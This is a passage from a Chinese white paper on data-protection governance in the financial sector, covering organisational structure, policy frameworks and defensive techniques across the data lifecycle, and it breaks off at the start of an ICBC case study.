保护的日常管理工作, 协调跨部门协作, 开展数据保护工作的考 核和评估管理, 直接向决策层报告工作。 执行层由数据主管部门、数据使用部门、数据运维部门等执 行部门组成, 并在各主要部门设置数据保护工作的专职岗位。执 行层各部门按照数据保护责任制落实数据保护的主体责任,在工 作中严格遵守管理层发布各项规章制度, 将数据保护落实到经营 管理的日常工作中并做细化落地。 监督层由企业或组织的风险管理部门和审计部门组成, 定期 对数据保护管理层和执行层的工作进行评估和审核,并将结果上 报给决策层。监督层的工作具有相对独立性, “3+1”层的数据 保护组织架构如图 4 所示。 图 4 “ 3+1”层的数据保护组织架构 各分支机构应建立相应的数据保护组织架构,负责在辖内贯 彻落实数据保护的各项政策和制度。 2.定责定岗定员 对数据保护组织架构中各个层次各个部门的工作职责进行 细致的分工,如数据管理部门在本部门业务数据范畴内提出数据 保护需求,并对本业务条线数据保护情况进行持续监控和改进; 数据采集部门按照数据保护技术规范采集数据等。 明确数据工作人员的岗位职责, 完善岗位职责说明书, 明确 数据保护工作的具体岗位,以及人员能力要求, 并明确岗位互斥 要求。 明确总部和分支机构的职能定位、工作范围和相应人员需求 优化人员配置比例,制定总部和分支机构的人员交流计划和流动 通道。 3.队伍建设 基于企业或组织发展战略与数字化转型工作要求,构建与之 相适应的数据保护人员资源需求,制定相应的人力资源规划,以 及可行的人员补充计划。力促数据保护专职人员占到科技人员的 3%,为数据保护工作提供充分的人才支撑。 培养企业或组织自己的数据保护人才队伍,建设一支切实掌 握理论、充分学习实践的专业复合型队伍,加强专家级人才的引 进与培养。建立适合于数据保护工作特色的激励机制, 拓宽人员 发展空间。 建立科学的管理和培训体系, 快速提升人员能力素质。提高 培训的专业化水平, 加大专家级培训的投入, 定期进行专家级人 才的经验分享, 不断提高人员能力; 建立覆盖入职培训、在职岗 位培训、专业培训的全方位培训课程体系,加强培训效果评估和 跟踪,提高培训成果转化率。 (四)管理体系建设 1.建设思路 金融行业数据安全保护管理体系依赖于制度和流程规范的 建立, 在建设和不断完善的过程中, 应紧密贴合金融机构的组织 架构, 以及机构内各部门的管理职能(领域) 的衔接融合,以便 能够共同承接顶层的数据安全保护战略。金融行业数据安全保护 管理体系建设思路如图 5 所示: 图 5 金融行业数据安全保护管理体系建设思路 2.体系介绍 (1) 框架介绍 数据安全保护管理体系包含基本制度、配套制度与流程规范, 这些制度文件的层级分别对应为第一、二、三级。具体的基本制 度、配套制度设计见图 6 所示: 图 6 基本制度、配套制度设计 根据制度框架所示,《数据安全保护基本制度》属于一级 制度, 一级制度下细分了二级相关制度(在金融行业对二级制 度也有细则的称谓),二级制度对应了相应的流程描述, 并视 需要定制规范性模板供使用参考。数据安全保护管理体系下制 度流程较多,他们之间的关系描述如下: (a)《基本制度》涵盖各领域专门制度。 (b)数据分级管理是建立统一、完善的数据生命周期安全 保护框架的基础工作, 能够为金融业机构制定有针对性的数据安 全管控措施提供支撑。因此《数据资产分类分级管理制度》是《数 据生命周期安全保护制度》的前提。在数据的分类分级明确后, 需将不同安全级别的数据的区分对待, 并融入到数据生命全周期 各具体场景中,这些要求应充分体现在《数据生命周期安全管理》 中。如上内容体现出这两个制度是《基本制度》涵盖领域的核心。 (c)数据安全保护应遵从金融机构内外部的审计合规, 因 此需要有《数据安全保护审计》的制度安排。《数据安全保护风 险评估管理》除包含合规审计风险外, 更应该关注于评估不同安 全级别的数据在生命周期的各环节被破坏后带来的影响/风险。 而《数据安全保护应急处置》制度, 应充分结合具体的数据风险 来制定, 使得应急处置具有针对性、有效性, 真正达到有效缓释 数据风险的目的。 (d)审计合规的检查结果不仅应作为考核评价的输入参考, 也应约束数据安全保护工作的自评估结果。同时,应将数据安全 保护工作纳入金融机构的考核评价体系中。自评估工作与考核评 价应统一协调进行。数据安全保护的审计合规、考核评价、自评 估之间关联、约束、协调,应分别在《数据安全保护考核(处罚 与奖励)》《数据安全保护的自评估》与《数据安全保护审计》 制度中充分体现。 (e)鉴于如上制度安排的安全保护工作会不同程度、不同 场景地涉及技术支撑, 因此应视组织的需要来选择性制定《数据 安全保护技术管理制度》或类似的约定。与此同时, 数据安全保 护技术的水平, 在具备一定的技术条件下,也可纳入自评估和考 核评价体系。若数据安全保护技术本身存在技术风险或导致引入 新的风险,应及时纳入风险评估并制定相应的风险缓释策略。制 度流程之间的关系如图 7 所示。 图 7 制度流程之间的关系 (2) 基本制度 基本制度即《数据安全保护基本制度》。主要分为总则、组 织架构、涵盖领域、附则部分。 (a)总则 阐述《数据安全保护基本制度》 (简称“《基本制度》”)的 目标、适用范围、关键术语定义等。 (b)组织架构 阐述管理组织架构与职责分工。 (c)涵盖领域 分章节简要阐述《基本制度》涵盖的各领域。阐述内容主要 按照如下顺序: 首先: 数据分类分级管理、基于数据分类分级的数据生命周 期安全管理。其中, 个人信息作为金融数据的一个重要子类和其 重要性, 需单独体现; 数据出口涉及数据要素在主权(领)域外 的共享或转让交易,单独体现。 其次:数据安全保护风险评估、基于风险评估的应急处置。 再次: 基于上述领域工作开展的内部主动审计与被审计,以 及内部考核评价。 最后, 基于《数据安全能力成熟度模型》等文件精神, 结合 自身的风险评估、应急处置、审计、考评结果, 对数据安全保护 能力和水平进行自评估。若涉及数据安全保护技术的评估,需重 点考量技术与如上制度和场景的配套完整性和支撑度。 (d)附则 要求数据资产管理应包含有数据保护, 且资产分类除立足于 使用、存储之外,应涵盖基于数据保护维度的资产分类方法, 以 便支持和呼应本制度框架。 (3) 配套制度与流程规范 配套制度与流程规范是在基本管理制度和组织架构保障的 基础上, 指导管理体系具体落地、支撑数据保护策略有效实施的 系列文件。其主要目标是进一步提升数据管理体系的落地性, 为 人员更好地履行数据保护职责、执行数据保护操作提供更加具体、 清晰、明确的步骤说明和操作指导。 (a)数据资产分类分级管理制度 金融行业数据安全保护管理体系应充分明确被保护的对象 为数据资产。因此, 应紧紧围绕金融数据资产, 考虑数据资产的 特性,避免数据安全保护与被保护对象脱节。 数据资产的分类分级管理是建立统一完善的数据全生命周 期保护框架的基础工作, 能够为金融业机构制定有针对性的数据 安全管控措施发挥不可替代的支撑作用。 其主要流程如下: 识别数据资产; 选定数据范围; 制定定级原则; 设定危害等级; 收集保护需求; 数据分类分级; 形成通用规则; 探讨特性规则; 分类分级维护; 分类分级备案。 (b)数据生命周期安全保护制度 金融数据生命周期安全保护是指金融业机构在开展业务和 进行经营管理的过程中, 对金融数据在采集、传输、存储、使用、 删除、销毁等环节对数据保护应遵守的基本操作和步骤。 数据生命周期安全保护,需以数据资产的分类分级为基础, 针对不同安全级别的数据,明确其在采集、传输、存储、使用、 删除,以及销毁等各个环节的安全保护措施, 形成覆盖全流程数 据安全保护能力。 主要流程如下: 依据数据分类分级规则和成果,对数据全链路做贯穿式 等级标识; 制定从金融信息主体处、外部机构处,以及所在数据安全 域直接或间接采集数据的策略; 建立数据传输授权机制,明确数据范围、频次、有效期。 根据不同传输形式和不同传输对象,采用适当的数据传 输技术(包含但不限于用户权限设置、网络协议、加密等 手段), 保障数据传输中的收发、登记、编号、传递、保 管和销毁各环节安全; 权衡数据安全保护级别、重要性、量级、使用频率等诸多 因素, 制定数据分域分级存储策略,并将策略覆盖到数据 存储、数据备份、数据恢复等活动; 识别数据使用场景中(数据的访问、导出、加工、展示、 开发测试、汇聚融合、公开披露、数据转让、委托处理、 数据共享等活动)不同的主体角色、信用等级、业务需要、 时效性等因素,制定数据使用通用保护规则,以及本机构 或部门级别特色需求的保护规则; 建立针对不同类型的数据设定数据保存期, 以及相应的 删除或销毁机制。数据保存周期应严格遵循国家、行业主 管部门、本机构的有关规定及与个人金融信息主体约定 的时限。对于时限发生的变动,应及时响应评估并做适应 性保护策略调整。 (c)数据安全保护风险评估管理制度 主要流程如下: 锚定数据分级规则和数据生命周期安全管理策略; 识别如上规则和策略与数据安全保护能力成熟度的差距; 基于风险分类建立定性与定量相结合的评估方法; 依据制定的评估方法, 对不同类型的风险,比对成熟度差 距进行风险评估并得出风险估值(原始值),为数据安全 保护应急处置提供重要参考; 根据应急处置方案的缓释能力估值和方案执行效果的反 馈,不断修正风险评估方法和计量方法。 (d)数据安全保护应急处置制度 主要流程如下: 锚定数据分级规则和数据生命周期安全管理策略; 根据风险分类和原始估值制定应急处置策略,并对不同 的风险缓释策略进行缓释能力估值; 根据不同的应急处置策略及其缓释能力值,分别计算风 险残值; 应急处置情况通报; 根据实际应急情况下采用的策略和处置效果,持续优化 应急处置策略, 促进风险评估方法的不断优化。 (e)数据安全保护审计制度 主要流程如下: 将数据安全保护审计纳入本机构审计工作; 根据本机构实际情况,设定每期数据安全保护审计工作 目标; 执行审计并记录审计结果; 与审计相关方(干系人)确认审计结果,听取审计工作建 议并适应性采纳; 编写审计报告并向管理层、决策层上报, 听取领导工作指 示; 审计报告发布; 监督审计整改效果,定期开展“回头看”。 (f)数据安全保护考核(处罚与奖励)制度 主要流程如下: 将数据安全保护考核纳入本机构考核工作; 根据本机构实际情况,设定每期考核工作目标; 执行考核并记录考核结果; 与考核相关方(干系人)确认考核结果,听取采纳考核工 作建议并适应性采纳; 考核结果上报并听取领导工作指示; 考核结果发布; 定期评估考核方法提升效果,不断增强工作有效性。 (g )数据安全保护自评估 主要流程如下: 选定自评估范围,制定评估原则,收集评估标准; 设计评估模板, 编制评估标准; 设定评估优先级、评估周期; 执行评估; 与评估相关方(干系人)确认评估结果,听取评估工作建 议并适应性采纳; 评估结果上报并听取领导工作指示; 评估结果发布。 (i)小结 上述制度与流程规范的阐述主要从制度框架、制度关联性等 专业角度来阐述。对于管理体系中的制度没有接触或接触不多的 相关读者,可将上述管理体系的核心内容分为 4 类来理解,即: 数据资产分级分类、数据全生命周期保护、风险合规与考核,以 及通用安全基础。安全保护内容如图 8 所示: 图 8 数据安全保护体系总体框架 (4) 管理体系的持续发展 数据安全保护管理体系在实际应用过程中不是一成不变的, 需要根据具体施行情况和效果, 对体系进行持续的优化完善, 以 保证准确性、有效性、及时性,和适用性。通常来讲, 导致事物 变化的诱因可分为外部和内部因素。 外部因素包括但不局限于:数据安全能力成熟度模型、金融 数据安全数据生命周期安全规范、金融业数据能力建设指引、金 融数据安全分级指南、证券期货业数据分类分级指引、数据安全 治理能力评估方法、金融科技(FinTech)发展规划等一切有强 制/推荐执行,或者具有指导意义的文件精神,以及同行业最佳 实践的经验借鉴。当前数据安全已上升至国家层面, 而金融行业 事关国家经济命脉, 其天然是一个被强监管行业,因此金融机构 对外部因素应尤其重视。 内部因素包括但不局限于:本机构数据安全保护战略、组织 架构、专业团队水平、数据安全保护文化,以及数据安全保护需 求和能力的变化。 综上, 需要建立针对数据安全保护体系的管理机制, 包括整 体规划、制定设计、评审发布、监督评价、迭代更新。数据安全 保护体系的管理机制如图 9 所示 图 9 数据安全保护体系的管理机制 整体规划:依据国家和本机构的数据安全保护战略, 结合数 据保护工作开展的实际需要, 对管理体系进行整体规划, 明确工 作目标, 规划管理体系框架。 制定设计:依据整体规划阶段的成果, 按照特定工作领域细 化制度流程规范内容,重点关注流程规范的可操作性和落地性。 评审发布:组织评审制定设计阶段的成果。评审人员可包括 管理层、内外部专家、流程规范相关方等。评审结束后, 根据评 审结果及建议进行进一步修订直至正式发布。若评审过程中涉及 外部专家,应符合外部人员管理等相关规章制度。 监督评价:对制度流程规范具体执行过程中相关方的操作行 为等进行监控、记录与审计, 并可结合意见反馈、结果度量等方 式,对执行成效进行监督评价。 迭代更新:如本小节前文所列内外部因素,对管理体系进行 持续迭代更新。 需要说明的是, 内部因素和外部因素并不是严格对立的, 内 外部因素在一定的条件下可以相互影响。正如《数据安全法》第 九条62、第十条63所体现的精神, 有关部门、行业组织乃至国家多 个层面是共同提高数据安全保护水平的有机统一体。 (五)技术支撑建设 金融数据保护治理的技术支撑应用在完整的数据生命周期 当中, 包括金融数据的采集、传输、存储、使用、删除、销毁的 整个过程,明确在不同的阶段采用对应的技术手段实现金融数据 的保护治理, 结合金融业务规则和数据特点, 建立覆盖金融数据 生命周期全过程的安全防护机制,全面加强金融机构数据安全保 护能力。 金融数据保护治理的关键技术按照金融数据生命周期的流 程分类如图 10 所示: 62 《数据安全法》第九条:国家支持开展数据安全知识宣传普及,提高全社会的数据安全保护意识和水平,推动 有关部门、行业组织、科研机构、企业、个人等共同参与数据安全保护工作,形成全社会共同维护数据安全和促 进发展的良好环境。” 63 《数据安全法》第十条:“相关行业组织按照章程,依法制定数据安全行为规范和团体标准,加强行业自律, 指导会员加强数据安全保护,提高数据安全保护水平,促进行业健康发展。” 图 10 金融数据保护治理 关键技术分类 1.数据采集 数据采集是指金融业机构开展经营管理活动、提供金融产品 和服务过程中, 直接或间接从个人金融信息主体、企业客户,以 及外部数据供应方等外部实体获取数据的过程。数据采集过程中 可以采用以下技术手段防范数据泄露、数据源伪造、数据篡改等 风险。 (1) 密文接入 对于敏感信息的采集, 在信息所有者授权后, 应使用加密等 技术措施保证数据的保密性,并根据业务需要采取展示屏蔽等措 施防止明文回显,防止信息被未授权的第三方获取。 (2) 数据源鉴别 采用数字签名等技术对产生数据的数据源进行身份鉴别并 进行记录,防止数据仿冒和数据伪造。 (3) 质量控制 通过数据清洗(如去重、校验) 、数据转换(标准化) 等方 式对数据进行预处理, 保证数据采集过程中收集、产生的数据的 准确性、 一致性和完整性。同时可以通过数据采集监控, 对采集 过程、结果、明细进行动态监控,及时了解采集运转情况。 (4) 数据识别及分类分级 对数据资产进行准确的识别和分类分级, 掌握数据资产的分 布情况, 对后续开展数据保护治理工作将提供坚实的基础。我们 可以通过数据来源、数据内容、数据用途、数据协议、用户等对 采集的数据进行静态或动态的识别, 进而进行分类分级, 针对不 同级别的数据进行策略设置, 对数据的去向进行标记, 实现从采 集环节的跟踪管理。 2.数据传输 在数据传输环节中,有如下关键技术提供数据保护的能力支 撑: (1) 网络防护 不同网络区域或者安全域之间一般采取安全隔离和访问控 制措施, 如通过防火墙、入侵检测等安全技术或设备, 确保网络 边界安全;终端采取准入控制、终端鉴别等技术措施, 防止非法 或未授权终端接入内部网络。 (2) 通信安全 通信双方一般通过身份认证确保安全可信;采取设立专线或 VPN 等措施确保数据传输通道安全; 采用数字签名、时间戳、摘 要、消息认证码等密码技术或奇偶校验、校验和等非密码技术, 确保数据传输的机密性、完整性和抗抵赖性。 (3) 密码技术 依据《密码法》相关规定,遵循密码管理相关国家标准, 可 采用商用密码技术对传输中的数据进行保护,包括但不限于密码 算法、密码协议, 以及软硬件密码产品等。 (4) 物理介质安全 通过确保物理介质安全保证数据传输的安全性, 一般可以通 过密钥、口令等方式控制对物理介质的访问, 还可以通过加密方 式确保数据在物理介质中安全存储。 3.数据存储 数据存储是指金融业机构在提供金融产品和服务、开展经营 管理活动中, 将数据进行持久化保存的过程, 包括但不限于采用 磁盘、磁带、云存储服务、网络存储设备等载体存储数据。在数 据存储环节中, 有如下关键技术提供数据保护的能力支撑: (1) 加密存储 加密存储可以防止数据窃取和泄密。加密过的文档, 未经许 可及对应权限无法打开, 即使被拷走, 数据是密文形式, 无法查 看其真实内容。数据加密类型常用的分为两种: (a)对称加密技术 对称加密利用一个密钥对数据进行加密, 对方接收到数据后, 需要用同一密钥来进行解密。这种加密技术的特点是数学运算量 小, 加密速度快,其主要弱点在于密钥管理困难,而且一旦密钥 泄露则直接影响到信息的安全性。国内金融行业应用推荐使用国 密商用密码算法 SM1、SM4 等。 (b)非对称加密技术 非对称加密算法的核心是运用一种特殊的数学函数--单向 陷门函数, 即从一个方向求值是容易的,但其逆向计算却很困难, 从而在实际上成为不可行的。公开密钥加密技术不仅保证了安全 性又易于管理。其不足是加密和解密的时间长。国内金融行业应 用推荐使用国密商用密码算法 SM2 等。 除了密码学算法本身的安全性和健壮性, 一个密码系统的安 全性也取决于对密钥的保护和管理。密钥管理指自密钥的产生到 密钥的销毁,整个过程大致包括密钥的生成、存储、分配、启用、 停用、控制、更新、撤销和销毁,其中密钥的分配和存储最为关 键。密钥的管理目的是维护系统与各个实体之间的密钥关系, 以 抵抗各种可能的威胁, 密钥管理要借助加密、认证、签名等技术 手段来实现, 密钥的更换采用一次一密、定期更换等方式来保证 密钥安全。 《金融数据安全 数据生命周期安全规范》要求: “3 级数据 的存储应采取加密等技术措施保证数据存储的保密性”,但是数 据从明文状态加密至密文状态的计算开销、存储开销和快速检索 问题, 都是对运维人员的挑战, 只有解决了这一系列问题,才能 保证加密存储的同时,数据安全、高效的可用。 (2) 分级存储 金融数据分类分级与策略定制服务是在数据资产梳理的基 础之上,建立数据分类分级标准,从而对数据资产清单进行准确、 标准化的分级; 同时, 结合金融行业机构数据的使用场景,明确 制定并严格执行对不同敏感级别数据的安全管控规范。金融数据 分级存储技术指根据数据不同的重要性、访问频次等指标分别存 储在不同性能和安全级别的存储设备上,采取不同的存储方式。 在实际落地过程中,某种敏感业务类型是由数十种原子敏感 数据组成的, 而这些原子类型也会跨多个表来存储, 这将给分级 类型的识别带来困扰。这也是分类、分级逻辑上简单、但落地困 难的原因,需要专业的系统感知各物理表中的敏感数据比例, 充 分分析整体数据存储情况来给出智能推断,辅助分类分级达到良 好的落地效果。 (3) 分域存储 金融数据的存储按照不同的区域进行预先规划, 并对不同区 域之间的数据流动进行安全管控, 如:根据开发测试、数据分析、 生产服务等不同用途来划分不同的区域对金融数据进行存储和 应用。 (4) 备份恢复 数据安全问题中最严重的是数据的丢失和篡改,容灾备份是 解决该问题最有效的方案,能够在灾难来临时, 实现关键数据的 快速恢复,保证信息系统的正常运行及数据的一致性。金融机构 需要根据数据的安全级别和数据对系统运行的影响,制定数据备 份策略和恢复策略。在实施环节应注意: 1)生产数据应采取实 时备份与异步备份、增量备份与完全备份的方式,提供本地数据 备份与恢复功能;2)采用异地备份的方式进行异地容灾; 3)应 定期对备份数据的有效性和可用性进行检查。 4.数据使用 数据使用是指金融业机构在提供金融产品和服务、开展经营 管理活动中,进行数据的访问、导出、加工、展示、开发测试、 汇聚融合、公开披露、数据转让、委托处理、数据共享等活动。 (1) 访问安全 数据使用不应超出数据采集时所声明的目的和范围,数据使 用过程存在数据非授权访问、窃取、泄露、篡改、损毁等安全风 险, 需要通过访问控制来确保数据使用的安全。访问控制技术主 要涉及安全模型、控制策略、控制策略的实现、授权与审计等, 其中安全模型是访问控制的理论基础,其他技术则是实现安全模 型的技术保障。安全模型是制定安全策略的依据,用形式化的方 法来准确地描述安全的重要方面(机密性、完整性和可用性)及 其与系统行为的关系。 安全模型应综合考虑主体角色、业务需要、时效性等因素, 按最小化原则确定数据的访问权限规则。同时应根据数据的不同 安全级别,制定和明确数据访问控制过程中的相关安全措施, 保 障金融数据在被访问过程中的保密性和完整性。 (2) 数据脱敏 在金融机构内部进行开发测试、数据分析用途的数据应用时, 可以通过数据脱敏技术, 对发放到开发测试环境或分析环境的生 产数据预先进行脱敏处理,确保经过脱敏后的数据不再带有敏感 信息, 即可以进行开发测试和数据分析。数据脱敏技术包括: 静 态脱敏、动态脱敏等, 消除数据的信息敏感性, 有效保证重要数 据在分析、开发、测试等数据使用环节中的安全性。 静态脱敏用于对开发或测试中的数据集而不是生产中的数 据集。数据在使用之前被脱敏, 因此数据在存储和随后的使用或 传播过程中受到保护。动态脱敏在应用程序或个人根据授权访问 数据时, 实时进行脱敏操作。 (3) 数据水印 数据水印指从原始环境向目标环境进行敏感数据交换时, 通 过一定的方法向数据中植入水印标记, 从而使数据具有可识别分 发者、分发对象、分发时间、分发目的等因素, 同时保留目标环 境业务所需的数据特性或内容的数据处理过程。数据水印的基本 设计原则包括: 可追溯性、仿真性、部分有效性、可配置性和安 全性。 生成数据水印的具体技术方法包含:伪行水印、伪列水印、 脱敏水印等,数据水印应用的两种方式是: 静态水印和动态水印。 数据水印需要能抵抗一定失真内的恶意攻击,并且一般的数据处 理不影响水印提取, 因此数据水印在实际落地应用过程中仍然需 要进一步探索和实践。 (4) 用户与实体行为分析 UEBA(User and Entity Behavior Analytics,用户与实体 行为分析)通过机器学习分析来构建用户和对象(包括主机, 应 用程序, 网络流量和数据库等)的标准配置,以及正常行为模型, 相较标准基线, 对异常行为的分析可以帮助用户发现安全威胁和 隐患。 UEBA 常用来检测恶意的内部人员和外部攻击者对企业信 息系统的渗透和数据窃取。 相较于传统的安全设备分析外部威胁系统,例如:SOC/SIEM (Security Operations Center/Security Information Event Management,安全运营中心/安全事件管理),UEBA 更加聚焦于 “异常用户”(即特权账号被盗用) 和“用户异常”(即合法的 人做不合法的事), 在海量告警信息中通过模型和规则分析企业 内部威胁,更侧重于关注用户的行为,从另一视角去发现问题。 UEBA 的分析方法包括: 有监督的机器学习、贝叶斯网络、无监督 学习、强化/半监督机器学习、深度学习等。 (5) 联邦学习 在金融数据应用于融合多方外部数据的建模应用时,为了保 护金融数据的隐私安全, 可以借助联邦学习技术实现“数据可用 不可见”的机器学习模型训练。联邦学习技术使不同的数据拥有 方的私有数据不出数据方定义的私有边界内,可以在不交换彼此 私有数据的情况下, 训练一个共有模型。这个共有模型的效果与 聚合各方数据建立的模型效果相接近。以包含两个数据方的联邦 学习为例, 双方各自拥有一个数据集,按照数据集的分布可分为: (a)两个数据集的特征空间重叠部分较大,而样本重叠部 分较小或没有重叠部分, 对应的学习模式为横向联邦学习(跨样 本联邦学习); (b)两个数据集的样本重叠部分较大,而特征空间重叠部 分较小或没有重叠部分, 对应的学习模式称为纵向联邦学习(跨 特征联邦学习) ; (c)两个数据集的样本与特征空间重叠部分都较小或没有 重叠部分,对应的学习模式称为联邦迁移学习。 (6) 多方安全计算 不同机构的数据以不同的存储方式存储在不同的 IT 基础设 施之上, 通常所说的数据融合需要将不同机构的数据融合在一起, 存在极大的行业监管风险。多方安全计算技术可以使金融数据在 逻辑上与外部区域的数据进行融合关联, 物理上数据仍存在各自 机构中, 实现安全多方联合计算,进而保障各个合作机构的合规 安全,为科学分析、预测和决策提供底层数据能力支持。 多方安全计算主要研究针对无可信第三方情况下,安全地进 行多方协同的计算问题。即在一个分布式网络中,多个参与实体 各自持有秘密数据,各方希望以这些数据为输入共同完成对某函 数的计算,而要求每个参与实体除计算结果、预期可公开的信息 外均不能得到其他参与实体的任何输入信息。 5.数据删除 数据删除是指在系统及设备中去除数据, 使其保持不可被检 索、访问的状态。 (1) 安全删除 超过国家及行业主管部门有关规定、内部规章、合同协议, 以及与个人金融信息主体约定的数据保存时限的情况下, 金融数 据应执行数据删除操作。在金融机构内部作为开发测试、数据分 析用途的金融数据在按需应用结束后,同样需要采取删除操作。 金融数据的删除过程可通过金融产品和服务的业务系统进行,通 过严格的权限控制、流程审批保证删除操作的安全执行, 删除的 目标数据范围准确无偏差,确保数据在删除之后,无法在业务系 统、数据库系统、文件系统,以及其他相关系统上再次被检索和 访问。 (2) 匿名化处理 当金融机构的产品或服务停止对外服务时,应对在提供金融 产品或服务过程中收集的个人金融信息做删除或匿名化处理。法 律、行政法规规定的保存期限尚未届满, 或者删除个人信息从技 术上难以实现的,个人信息处理者应当停止除存储和采取必要的 安全保护措施之外的处理。 匿名化处理技术可移除或修改个人身份信息;经过匿名化处 理的数据无法用来与任何个人关联到一起。数据匿名化处理的代 表 技 术 有 k- 匿 名 化 ( k-anonymization) 和 差 分 隐 私 (Differential Privacy)。 k-匿名技术通过扰动和泛化的方法使得每一个准标识符都 至少对应 k 个实例, 这样就不能唯一识别,从而保护了用户的数 据隐私。差分隐私是一种向数据中添加数学噪声的技术, 保证数 据集中任意个体的变化对最终的统计结果几乎没有影响, 使处理 过后的数据, 无法确定任何个人是否属于某数据集。匿名化处理 技术的研究工作主要集中在保护隐私信息的同时,提高数据的可 用性,这两个方面的平衡是技术实际落地应用的难点。 (3) 过程记录与复核 较为重要的金融数据在进行数据删除的同时,需要保证删除 过程被完整记录,同时建立有效性复核机制, 定期通过对应的金 融产品或服务业务前台系统或管理后台, 进行是否可以访问删除 数据的探查操作。 6.数据销毁 数据销毁是指金融机构在停止业务服务、数据使用,以及存 储空间释放再分配等场景下, 对数据库、服务器和终端中的剩余 数据,以及硬件存储介质等采用数据擦除或者物理销毁的方式确 保数据无法复原的过程。 (1) 安全擦除 安全擦除指使用预先定义的无意义、无规律的信息多次反复 写入存储介质的存储数据区域, 进行数据覆写确保介质中的数据 不可再被恢复或者以其他形式被利用。数据覆写是将非保密数据 写入以前存有敏感数据的硬盘簇的过程,使用预先定义的无意义、 无规律的信息反复多次覆盖硬盘上原先存储的数据,就无法获知 原始数据,达到安全擦除的目的。根据数据覆写时的具体顺序, 可将其分为逐位覆写、跳位覆写、随机覆写等模式。根据时间、 密级的不同要求,可组合使用上述模式。 在完成安全擦除之后, 需要通过数据恢复工具或数据发现工 具进行数据的尝试恢复及检查, 验证安全擦除结果。 (2) 物理销毁 当存储数据的介质不再使用时, 采用不可恢复的方式对介质 本身进行销毁处理。物理销毁指采用物理破坏的方法是存储介质 彻底失效,具体方法分为:消磁、焚化、粉碎等方式。消磁是磁 介质被擦除的过程, 对硬盘施加瞬间强磁场, 磁性颗粒就会沿场 强方向一致排列,变成了清一色的“0”或“1”,失去了数据记 录功能。焚化、粉碎指由专门机构通过熔炼工具、粉碎工具对物 理介质进行销毁处理。 较为重要的金融数据的存储介质不能移作他用, 在销毁时应 采用物理销毁的方式对其进行销毁处理。 (3) 云环境销毁 如待销毁数据曾保存在云存储、云计算等云服务平台中, 需 要根据云上存储的数据类型、存储方式、管控手段等, 使用云服 务平台提供的数据销毁机制彻底清除和销毁云平台中存储的数 据。 五、发展展望 数据保护治理是个系统性的工程,需要国家立法部门、政策 制定部门、监管部门引导和组织相关企业相互协作, 合力应对数 字经济时代的数据安全风险和挑战,尽快为我国建立和发展数据 安全保护的生态体系, 保障数字经济健康有序发展。我们提出如 下展望: (一)聚焦实操问题,加快数据保护实施标准建设 聚焦数据权属界定、数据保护技术等实操问题, 鼓励企业实 质性参与数据保护等实施标准的制修订工作,研制可操作性强、 量化指标明确、与实际技术发展水平衔接紧密, 更具参考价值的 标准。例如在数据归属权方面,根据《个人信息保护法》, 个人 信息不包括匿名化64处理后的信息,即带有自然人标识的信息或 者可被复原的自然人信息归属权为“自然人”,采集和使用均需 征求“自然人”的同意; 匿名化后的数据则归属权为“个人信息 处理者”(例如金融机构)。但在实际操作落地过程中, “匿名 化”的实施标准,以及相关技术操作指引尚不明确, 进一步导致 了在实操层面个人信息权属难以界定的问题。此外, 建议国家及 相关监管部门积极开展数据领域国际交流与合作,充分借鉴国外 在数据保护方面的先进实践经验,促进我国数据保护标准体系的 不断完善。 64 匿名化是指个人信息经过处理无法识别特定自然人且不能复原的过程 (二)优化数据保护技术,推动数据共享良性循环 鉴于数据要素资产的特殊属性, 需要大力跟进和推动以下新 技术的研发和迭代, 保证数据提供方、使用方、监管方的利益和 诉求, 推动数据共享交流的良性循环。 一是建议持续优化“数据 识别与分类分级”、“匿名化”、“脱敏”等技术, 为金融数据 分类分级及保护提供有效技术支撑。二是建议持续推进同态加密、 多方安全计算、联邦学习等隐私计算技术的发展与应用, 实现数 据使用上的“可用不可见”, “开放不共享”,保障金融机构间 跨实体的数据流通安全。三是大力发展可信区块链技术、数据水 印和数据血缘技术。其中, 利用区块链不可篡改,可追溯的特点, 提供可信的数据上线、认证、使用和交易平台, 支持开放透明的 数据共享和交易监管; 利用数据水印与血缘分析保证数据流转和 衍生数据的可追溯性, 保障数据提供者和使用者的权益, 提供有 效的监管支持。 (三)强化数据安全评估,建立闭环式管控体系 《金融数据安全 数据生命周期安全规范》(JR/T 0223-2021) 要求金融机构建立数据安全评估、个人金融信息安全影响评估, 以及内外部数据安全检查与评估制度。同时该规范中提到了 30 余处安全评估建议, 例如“在数据汇聚融合阶段,汇聚融合的数 据不应超出采集时所声明的使用范围, 汇聚融合前应根据汇聚融 合后可能产生的数据内容、所用于的目的、范围等开展数据安全 影响评估,并采取适当的技术保护措施。”此类安全评估要求囊 括了数据采集、传输、存储、使用、销毁,以及第三方机构管理 的各个实施环节,目前金标委已发布《金融数据安全 数据安全 评估规范》(征求意见稿),并向各机构征求意见, 该标准旨在 推动金融机构落实金融业数据安全管理要求,提升金融业数据安 全保护工作的规范化和标准化程度,同时为金融业机构制定防范 措施及应对安全事件提供科学依据和指导。建议各家金融机构聚 焦用数场景加紧对标,助力金融行业数据安全评估体系的落地, 建立闭环式的数据安全管控机制。 附录 A:金融业数据保护治理实践案例 案例一:工商银行数据保护治理实践 1.案例背景 为了应对数字化时代的到来,工商银行积极拥抱科技变革, 加速推进以大数据为生产要素、以科技为生产工具的新的金融发 展格局, 金融行业用数规模,以及用数生态随之发生了前所未有 的变化。规模化用数、“普惠”用数、跨机构共享用数等需求日 益旺盛,同时国内外对数据共享合作的管理要求日趋细化严格, 各金融机构亟需尽快构建安全合规的用数生态。在此背景下, 工 商银行开展了新一轮的数据保护治理工作,面向全行数据要素, 坚持安全与发展并重, 既充分发挥数据价值, 促进数据要素市场 化, 又避免数据隐私、数据泄露、数据滥用、数据损失等方面带 来的安全问题。 2.安全对策 工商银行结合全行发展战略,把数据保护治理纳入战略规 划目标, 构建全面的数据保护治理体系, 以及数据全生命周期 的风险管理机制。在数据保护治理工作中,重点开展组织建 设、制度流程规范建设, 以及技术支撑体系建设等工作。 (1) 组织建设: 依托现有数据治理的组织架构,明确各 机构的数据保护治理职责。 (2) 制度流程规范建设:在现有数据治理的制度规范体 系中纳入数据保护相关内容,规范数据保护治理工作机制。 (3) 技术支撑体系建设:强化科技支撑,重点开展技术 平台能力建设。 工行数据保护框架如图 11 所示: 图 11 工行数据保护框架 3.保护治理实践 工商银行依托数据治理工作,建立了完善的数据安全组织架 构及流程规范体系,分别从业务制度和技术控制两个角度合力开 展数据保护治理工作。 (1) 业务制度:积极贯彻国家法律法规及行业标准, 完 善各类内部制度及审批管理流程,包括数据安全分级分类、对 外合作客户信息安全、集团内部客户信息共享、个人客户信息 